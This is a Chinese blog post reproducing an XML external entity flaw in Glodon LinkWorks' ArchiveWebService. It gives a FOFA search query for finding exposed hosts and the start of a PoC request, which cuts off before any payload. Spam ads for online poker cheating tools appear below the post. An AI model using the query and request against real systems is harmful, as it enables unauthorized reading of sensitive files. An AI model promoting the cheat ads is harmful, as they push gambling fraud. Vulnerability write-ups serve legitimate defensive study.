广联达Linkworks ArchiveWebService XML实体注入漏洞复现
创始人
2025-01-07 20:36:42
0

0x01 产品简介

广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现

PoC

POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1 Host:  Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebServi

上一篇:中英双语介绍一级市场(Primary Market)和二级市场(Secondary Market)

下一篇:去中心化技术的变革力量:探索Web3的潜力

相关内容

热门资讯

黑科技系统(wepoker有外... 黑科技系统(wepoker有外挂吗)外挂黑科技辅助下载(透视)真是是真的有挂(黑科技详情)1、上手简...
挂黑科技!德扑手牌胜率计算工具... 挂黑科技!德扑手牌胜率计算工具(透视)太坑了有挂(靠谱教程黑科技介绍)1、每一步都需要思考,不同水平...
黑科技真的!微扑克做弊(we辅... 黑科技真的!微扑克做弊(we辅助poker)黑科技辅助挂(玩家必看教程黑科技辅助)1、很好的工具软件...
先锋大厅辅助,蜜瓜大厅辅助下载... 先锋大厅辅助,蜜瓜大厅辅助下载,wpk透视脚本链接(有挂插件);暗藏猫腻,小编详细说明蜜瓜大厅辅助下...
黑科技模拟器(wepoke软件... 黑科技模拟器(wepoke软件透明挂)外挂透明挂辅助挂(透视)切实有挂(黑科技脚本)1、实时wepo...
科技黑科技!德州菠萝辅助工具(... 科技黑科技!德州菠萝辅助工具(透视)太坑了真的有挂(解说技巧黑科技辅助)1、很好的工具软件,可以解锁...
黑科技实锤!wpk有透视外挂吗... 这是一款非常优秀的wpk有透视外挂吗 ia辅助检测软件,能够让你了解到wpk有透视外挂吗中牌率当中全...
新蛮王辅助器,边锋干橙眼辅助器... 新蛮王辅助器,边锋干橙眼辅助器下载,wpk脚本下载(有挂攻略)1、实时边锋干橙眼辅助器下载开挂更新:...
真的黑科技!德扑之星ai代打真... 真的黑科技!德扑之星ai代打真假(透视)太坑了是有挂(揭秘攻略黑科技详情)小薇(透视辅助)致您一封信...
黑科技辅助挂(微扑克wpk透视... 黑科技辅助挂(微扑克wpk透视辅助在哪下)外挂透视辅助方法(透视)都是是真的有挂(黑科技方法)1、黑...